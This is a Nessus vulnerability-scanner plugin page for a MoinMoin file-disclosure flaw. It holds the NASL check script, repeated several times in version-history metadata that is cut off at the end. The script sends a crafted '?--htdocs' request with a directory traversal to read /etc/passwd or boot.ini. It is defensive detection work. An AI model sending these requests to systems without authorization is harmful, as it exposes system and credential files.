ID MOINMOIN_ARGV_INFO_DISCLOSURE.NASL Type nessus Reporter This script is Copyright (C) 2010-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The version of MoinMoin running on the remote host has an information
disclosure vulnerability. Using a specially crafted request, an
unauthenticated, remote attacker can specify the directory that the
application uses for its static pages and read arbitrary files from
that directory, subject to the privileges under which the application
runs.
Note that successful exploitation requires MoinMoin
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(44383);
script_version("1.8");
script_cvs_date("Date: 2018/06/13 18:56:28");
script_bugtraq_id(37853);
script_xref(name:"Secunia", value:"38242");
script_name(english:"MoinMoin 'sys.argv' Information Disclosure");
script_summary(english:"Tries to retrieve a local file");
script_set_attribute(
attribute:"synopsis",
value:
"A wiki application on the remote web server has an information
disclosure vulnerability."
);
script_set_attribute(
attribute:"description",
value:
"The version of MoinMoin running on the remote host has an information
disclosure vulnerability. Using a specially crafted request, an
unauthenticated, remote attacker can specify the directory that the
application uses for its static pages and read arbitrary files from
that directory, subject to the privileges under which the application
runs.
Note that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'
setting to be enabled."
);
script_set_attribute(attribute:"see_also", value:"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18");
script_set_attribute(
attribute:"see_also",
value:"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2"
);
script_set_attribute(
attribute:"see_also",
value:"http://moinmo.in/SecurityFixes"
);
script_set_attribute(attribute:"solution", value:"Upgrade to MoinMoin 1.9.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/18");
script_set_attribute(attribute:"patch_publication_date", value:"2010/01/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/02/02");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
script_dependencies("moinmoin_detect.nasl", "os_fingerprint.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/moinmoin");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:80);
install = get_install_from_kb(appname:'moinmoin', port:port);
if (isnull(install))
exit(1, "No MoinMoin installs on port "+port+" were found in the KB.");
url = install['dir']+'/';
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
# First figure out the name of the static page directory
pattern = '<script type="text/javascript" src="(/[^/]+)/common/js/common.js">';
match = eregmatch(string:res[2], pattern:pattern);
if (match)
static_dir = match[1];
else
exit(1, "Unable to extract static page dir from "+build_url(qs:url, port:port)+".");
os = get_kb_item("Host/OS");
if (!os || 'Windows' >< os)
{
# we'll do a dir traversal instead of providing an absolute path, which would
# require specifying a drive letter
dir['win'] = '../../../../../../../../../../../../../../../';
file['win'] = 'boot.ini';
pat['win'] = '\\[boot loader\\]';
}
if (!os || 'Windows' >!< os)
{
dir['unix'] = '/etc';
file['unix'] = 'passwd';
pat['unix'] = 'root:.*:0:[01]:';
}
# Then try to get a file outside the web root
foreach os (keys(dir))
{
url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))
{
if (report_verbosity > 0)
{
trailer = NULL;
if (report_verbosity > 1)
{
trailer =
crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n'+
res[2]+'\n'+
crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n';
}
report = get_vuln_report(items:url, port:port, trailer:trailer);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
full_url = build_url(qs:install['dir'] + '/', port:port);
exit(0, 'The MoinMoin install at '+full_url+' is not affected.');
{"id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "bulletinFamily": "scanner", "title": "MoinMoin 'sys.argv' Information Disclosure", "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin", "published": "2010-02-02T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/44383", "reporter": "This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "cvelist": [], "type": "nessus", "lastseen": "2019-11-01T02:55:26", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "08d6d67e1bf48fdcedfe1c3a782db6bd0bb02fbb81748161b9de4731db0d627c", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}, {"hash": "3d64be2a10bddd78c2b3802b6ddf9f96", "key": "sourceData"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2017-10-29T13:43:01", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:23 $\");\n\n script_bugtraq_id(37853);\n script_osvdb_id(61831);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:43:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:10:18", "references": [{"idList": ["MOINMOIN_DETECT.NASL"], "type": "nessus"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "fb87ef0420b96dca9fb4052d50d03f2607e45d9a2ef2c0de9be8f39de5af992a", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc", "key": "sourceData"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "bf6ea977edb8f3eb799754f735e780f2", "key": "description"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2019-01-16T20:10:18", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:10:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 1, "enchantments": {}, "hash": "b5bbb3dab7ad14b89ff43aa46b1d5fb61ca42b354021d3369aad8a0921350848", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "3d64be2a10bddd78c2b3802b6ddf9f96", "key": "sourceData"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2016-09-26T17:25:57", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:23 $\");\n\n script_bugtraq_id(37853);\n script_osvdb_id(61831);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:57"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-10-28T20:41:52", "references": [{"idList": ["MOINMOIN_DETECT.NASL"], "type": "nessus"}]}, "score": {"modified": "2019-10-28T20:41:52", "value": 0.3, "vector": "NONE"}}, "hash": "13139e79a3a9948aea489b00212af16f15f1b72e1ba5123c05bbd0b02d8e5d7f", "hashmap": [{"hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc", "key": "sourceData"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "6d8679ef1db4573a6f317ba0acf5e0b7", "key": "description"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "03db36597b98092613edba567eb84b31", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "bdb756c45ebf4e8973011f75b09eb8e4", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2019-10-28T20:41:52", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n 